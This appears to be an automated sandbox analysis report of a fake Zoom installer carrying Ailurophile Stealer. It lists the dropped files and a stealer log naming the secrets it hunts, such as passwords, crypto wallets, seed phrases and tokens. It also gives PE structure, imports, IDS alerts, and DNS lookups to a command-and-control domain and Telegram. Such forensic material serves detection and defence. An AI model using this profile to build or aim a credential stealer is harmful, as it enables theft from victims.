                                                                                  SHA-512:A09698EA2285F5C92CE2A248986166F0F23E21EAE13C7AFAF5A9AAF1F564D018ED9A53514C2EFC29372DD5C3520537CA04983DDB938CEA92517BC71A1015712F
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - https://ailurophilestealer.com - Telegram: @Ailurophilevn..IP: 173.254.250.72.Country: United States.Hostname: 216554.PC Type: Microsoft Windows 10 Pro 10.0.19045.Architecture: amd64.File Path: C:\Users\user\Desktop.Main Path: C:\Users\user\AppData\Local\Ailurophile.Allowed Extensions: [rdp txt doc docx pdf csv xls xlsx keys ldb log].Folders to Search: [Documents Desktop Downloads].Files: [secret password account tax key wallet gang default backup passw mdp motdepasse acc mot_de_passe login secret bot atomic account acount paypal banque bot metamask wallet crypto exodus discord 2fa code memo compte token backup secret seed mnemonic memoric private key passphrase pass phrase steal bank info casino prv priv. prive telegram identifiant identifiants personnel trading bitcoin sauvegarde funds recup note].MAC Address: ec:f4:bb:ea:15:88.Screen Resolution: 1280x1024.Browsers:.Chrome Default - version: 117.0.5938.132.Edge Default - version: 117.0.2045.47.
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                  Category:dropped
                                                                                  Size (bytes):3822
                                                                                  Entropy (8bit):7.490205532827105
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:TmL0dGf7QmL0dGf7QmL0dGf7QmL0dGf7QmL0dGf7Ok:i48n48n48n48n48Kk
                                                                                  MD5:0D0E3012B9AE166C6F561C6B1FBE6566
                                                                                  SHA1:F8997167083262B609EDC56D1BD0EF68DC35FB30
                                                                                  SHA-256:44FDBCBB3D33289C5A2F91D450521409799094A6DF22A9175028E4EC2F69C8AC
                                                                                  SHA-512:DB42ED1994E72B8D6D243B33B0873D715A418146F53C9582889CC571120275012F314A5C40D1B2D2F7AB77E58741698F0ADBF5C7C2AE9A88B43D7DE314FBDC67
                                                                                  Malicious:false
                                                                                  Preview:PK (zip archive containing KATAXZVCPS.pdf)
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.1358696453229276
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):159744
                                                                                  Entropy (8bit):0.7873599747470391
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):126976
                                                                                  Entropy (8bit):0.47147045728725767
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):0.8180424350137764
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1148
                                                                                  Entropy (8bit):5.330417430258538
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:3Zhl1SKco4KmZjKbmuu1od6em9qr9tYs4RPQoUEJ0gt/NKIl9rgq:rl1SU4xymdajm9qr9tz4RIoUl8NDx
                                                                                  MD5:7D06B6307DEAEAF6764575F610B2FFA4
                                                                                  SHA1:5189934A787737748A8C2BAD53F7D9BB360A2337
                                                                                  SHA-256:5B2985C57741BE839F2D09555A87462066B5A9DFA22984032C2F3F855E6E48F8
                                                                                  SHA-512:E7FF8BEF1ED66DC1DBB4F395D66B479E2F4CDCE1D79A6734885DB9123EADC695500E60CD4E2A8502DBF62AF5BC599AADE23D755BED6752D93880EE8F992F0FFA
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................R..............@..........8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                  Entropy (8bit):5.871451489415792
                                                                                  TrID:
                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:ZoomInstaller.exe
                                                                                  File size:22'207'488 bytes
                                                                                  MD5:806a6ccce380785faa45512ce603c580
                                                                                  SHA1:78a2936e19f0474f80f73144564e9f24c4559859
                                                                                  SHA256:c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
                                                                                  SHA512:f228fceffc0af944cff9d06058aa690b1f6bcaea252971ac6b33c58e88429b108c2c4189e807c2659f40035160a4fdeacae961704c81a3e1ba8f1739df2d8e9e
                                                                                  SSDEEP:196608:KKopoPyXk3nLRT155J/YJMIYhOFWBe1ZiieX:zoP+dT155lD/ALiie
                                                                                  TLSH:4A275B46FA9449DACA959435C9AB42C53730FC041F2AABD75A08F33C7DB27D9AE78340
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........R..@....&....+.`>...R................@..............................X.......^...`... ............................
                                                                                  Icon Hash:0301c4e4ae4c2117
                                                                                  Entrypoint:0x1400013c0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x140000000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                  TLS Callbacks:0x403e5220, 0x1, 0x403e5200, 0x1
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:1
                                                                                  File Version Major:6
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:a7c025ffa07099999f6fbb8a47ebc600
                                                                                  Instruction
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  dec eax
                                                                                  mov eax, dword ptr [00738EA5h]
                                                                                  mov dword ptr [eax], 00000001h
                                                                                  call 00007FAE88B2A40Fh
                                                                                  nop
                                                                                  nop
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  ret
                                                                                  nop dword ptr [eax]
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  dec eax
                                                                                  mov eax, dword ptr [00738E85h]
                                                                                  mov dword ptr [eax], 00000000h
                                                                                  call 00007FAE88B2A3EFh
                                                                                  nop
                                                                                  nop
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  ret
                                                                                  nop dword ptr [eax]
                                                                                  jmp 00007FAE88F0FF58h
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  dec eax
                                                                                  lea ecx, dword ptr [00000009h]
                                                                                  jmp 00007FAE88B2A649h
                                                                                  nop dword ptr [eax+00h]
                                                                                  ret
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x7a9000 | 0x159 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7aa000 | 0x17cc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7ae000 | 0x1958 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x73b000 | 0x16848 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7b0000 | 0xe360 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x739ec0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7aa560 | 0x520 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e5fd0 | 0x3e6000 | 7ea4c339201cfc0d017ff0b87a4b19e3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x3e7000 | 0x44b60 | 0x44c00 | 7f3a4311981f005dbdcd4a469317bf79 | False | 0.35641690340909093 | data | 4.7016112525326035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x42c000 | 0x30efa0 | 0x30f000 | 980004199c90a11f5822ac71af072469 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata | 0x73b000 | 0x16848 | 0x16a00 | f43182d3de97642869b35118a096df21 | False | 0.4437478418508287 | data | 5.7958538093412795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata | 0x752000 | 0x6e38 | 0x7000 | b67dc254f2818584b007d9f5e7f6c7d0 | False | 0.15841238839285715 | data | 4.555509799133882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x759000 | 0x4fb90 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x7a9000 | 0x159 | 0x200 | 30fe0610bc0a77d191a7ad97749dc072 | False | 0.41796875 | data | 3.6898871269927276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0x7aa000 | 0x17cc | 0x1800 | 80786bfdb64d5983762cc60cec534c6d | False | 0.31103515625 | data | 4.581143990765701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x7ac000 | 0x60 | 0x200 | c169c31a7238605c1737945e51f7b6a8 | False | 0.064453125 | data | 0.3029571603346658 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x7ad000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7ae000 | 0x1958 | 0x1a00 | 620ce9f25f196dce93d103918034bcf6 | False | 0.42232572115384615 | data | 5.972815278958329 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7b0000 | 0xe360 | 0xe400 | 30c8e1f349b7c140a991746bf7696280 | False | 0.2539405153508772 | data | 5.433384464940853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/4 | 0x7bf000 | 0xa00 | 0xa00 | f572ff26ebb6d763b114fcdf85f1b0b7 | False | 0.23125 | data | 2.172227556052624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19 | 0x7c0000 | 0x4e8a6c | 0x4e8c00 | 18482ad49d6930aadea4051e7032cd1a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/31 | 0xca9000 | 0x5bb3 | 0x5c00 | 99cb2691f7a424dcc90dd9f3c5e9a3b4 | False | 0.25747282608695654 | data | 4.951740082737746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/45 | 0xcaf000 | 0x203134 | 0x203200 | d210e398493c72b90f26bbad6d9b7cf9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/57 | 0xeb3000 | 0x78908 | 0x78a00 | 66ed03329fa137a3544f15b3ac177939 | False | 0.24312459520725388 | data | 4.819335116736298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/70 | 0xf2c000 | 0x2d6e | 0x2e00 | 02ddab6e6787fb523255ef99c09c7514 | False | 0.467476222826087 | data | 4.902638410052134 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/81 | 0xf2f000 | 0x38fcdf | 0x38fe00 | ebc4ad0edd74625957cdfbc2787f88b4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/92 | 0x12bf000 | 0x112060 | 0x112200 | 991c4336c4aaf2c5a9b2538f095ccebb | False | 0.1585593721500228 | data | 2.3723520688244295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/106 | 0x13d2000 | 0x30 | 0x200 | 40cca7c46fc713b4f088e5d440ca7931 | False | 0.103515625 | data | 0.8556848540171443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/125 | 0x13d3000 | 0x3030 | 0x3200 | cdf146190012415e7b1a41f86838392c | False | 0.127890625 | data | 5.00188009895494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/141 | 0x13d7000 | 0x17ead2 | 0x17ec00 | fb09a426318d9493dd36d65f9dbaf405 | False | 0.42729807927824953 | data | 5.452375099590376 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/157 | 0x1556000 | 0x32615 | 0x32800 | 4f9c42a72c5c1f8cedaa8b20d619e1dd | False | 0.5112401376856436 | data | 5.516542450471743 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7ae130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15000 x 15000 px/m | English | United States | 0.4195590994371482
RT_GROUP_ICON | 0x7af1d8 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x7af1ec | 0x2dc | data | English | United States | 0.4931693989071038
RT_MANIFEST | 0x7af4c8 | 0x48f | XML 1.0 document, ASCII text | | | 0.40102827763496146
DLL | Import
KERNEL32.dll | AddVectoredContinueHandler, AddVectoredExceptionHandler, AreFileApisANSI, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateThread, CreateWaitableTimerA, CreateWaitableTimerExW, DeleteCriticalSection, DeleteFileA, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetErrorMode, GetFileAttributesA, GetFileAttributesExW, GetFileAttributesW, GetFileSize, GetFullPathNameA, GetFullPathNameW, GetLastError, GetProcAddress, GetProcessAffinityMask, GetProcessHeap, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathA, GetTempPathW, GetThreadContext, GetTickCount, GetVersionExA, GetVersionExW, HeapAlloc, HeapCompact, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LocalFree, LockFile, LockFileEx, MapViewOfFile, MultiByteToWideChar, OutputDebugStringA, OutputDebugStringW, PostQueuedCompletionStatus, QueryPerformanceCounter, RaiseFailFastException, ReadFile, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetProcessPriorityBoost, SetThreadContext, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TryEnterCriticalSection, UnlockFile, UnlockFileEx, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
msvcrt.dll | ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _localtime64, _lock, _unlock, abort, atexit, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, qsort, realloc, signal, strchr, strcmp, strcspn, strerror, strlen, strncmp, strrchr, strspn, vfprintf, wcslen
Name | Ordinal | Address
_cgo_dummy_export | 1 | 0x1407a7fd0
authorizerTrampoline | 2 | 0x1402e64b0
callbackTrampoline | 3 | 0x1402e6210
commitHookTrampoline | 4 | 0x1402e63a0
compareTrampoline | 5 | 0x1402e6310
doneTrampoline | 6 | 0x1402e62d0
preUpdateHookTrampoline | 7 | 0x1402e6530
rollbackHookTrampoline | 8 | 0x1402e6400
stepTrampoline | 9 | 0x1402e6270
updateHookTrampoline | 10 | 0x1402e6440
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T14:03:30.538215+0100 | 2057103 | ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) | 1 | 192.168.2.4 | 65406 | 1.1.1.1 | 53 | UDP
2024-10-29T14:03:31.221087+0100 | 2057104 | ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI | 1 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 14:03:05.822026968 CET | 49246 | 53 | 192.168.2.4 | 1.1.1.1
Oct 29, 2024 14:03:05.830513000 CET | 53 | 49246 | 1.1.1.1 | 192.168.2.4
Oct 29, 2024 14:03:30.538214922 CET | 65406 | 53 | 192.168.2.4 | 1.1.1.1
Oct 29, 2024 14:03:30.550745964 CET | 53 | 65406 | 1.1.1.1 | 192.168.2.4
Oct 29, 2024 14:03:32.071006060 CET | 65271 | 53 | 192.168.2.4 | 1.1.1.1
Oct 29, 2024 14:03:32.079205036 CET | 53 | 65271 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 14:03:05.822026968 CET | 192.168.2.4 | 1.1.1.1 | 0xab61 | Standard query (0) | api.myip.com | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:03:30.538214922 CET | 192.168.2.4 | 1.1.1.1 | 0xe34c | Standard query (0) | manestvli.shop | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:03:32.071006060 CET | 192.168.2.4 | 1.1.1.1 | 0x2106 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 14:03:05.830513000 CET | 1.1.1.1 | 192.168.2.4 | 0xab61 | No error (0) | api.myip.com | | 104.26.9.59 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:03:05.830513000 CET | 1.1.1.1 | 192.168.2.4 | 0xab61 | No error (0) | api.myip.com | | 104.26.8.59 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:03:05.830513000 CET | 1.1.1.1 | 192.168.2.4 | 0xab61 | No error (0) | api.myip.com | | 172.67.75.163 | A (IP address) | IN (0x0001) | false
